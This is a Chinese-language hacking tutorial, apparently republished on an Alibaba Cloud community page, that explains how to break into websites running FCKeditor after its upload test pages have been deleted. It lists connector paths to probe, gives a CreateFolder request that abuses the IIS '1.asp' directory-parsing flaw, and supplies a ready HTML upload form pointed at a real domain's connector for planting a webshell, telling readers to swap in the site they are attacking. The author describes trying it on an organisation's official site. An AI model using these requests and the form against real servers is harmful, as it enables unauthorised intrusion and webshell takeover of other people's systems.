解決Fckeditor刪除所有上傳頁面如何上傳入侵

來源:互聯網
上載者:User

好久沒有指令碼入侵了,今天因為參加了一個比賽,然後認證居然需要錢來買的,就很不爽,百度了下其官方網,進行了一次安檢,結果是沒有成功,因為iis的檔案解析漏洞補上了,不過學到了一些Fckeditor在沒有上傳頁面的情況下的入侵方式。

首先,你得確定下Fckeditor的版本。

/FCKeditor/editor/dialog/fck_about.html

其次,你確定下以下幾個上傳頁面是否真的被刪除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都已經刪除了,真是太倒黴了,怎麼辦,確認下這些檔案有哪個存在的麼

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以繼續看下去了,我這裡以aspx的為例

1.查看Media目錄下的檔案:

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

紅色Media可以更改為File或者image,相應的進入檔案或者圖片目錄下

2.利用iis解析漏洞建立1.asp特殊目錄

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

紅色的是對應的Media目錄,藍色的是特殊目錄名字

3.構建表單,上傳webshell到特殊目錄

<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>

將以上代表儲存為HTML格式,http://www.91ri.org修改成你入侵的網站地址,Type=Media是對應的Media目錄,1.asp為特殊目錄名。

最後的一些提示

上 傳之後的路徑需要你在上傳表單裡面的代碼裡找,當然,他的呈現方式是一個上傳好了的檔案名稱,全路徑必須你自己組合,我相信你是會的。如果訪問之後發現無法 訪問,試著上傳一張正確的圖片,再進行訪問,如果訪問成功,說明管理員已經補上了IIS路徑解析漏洞,那你得另找出路了。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.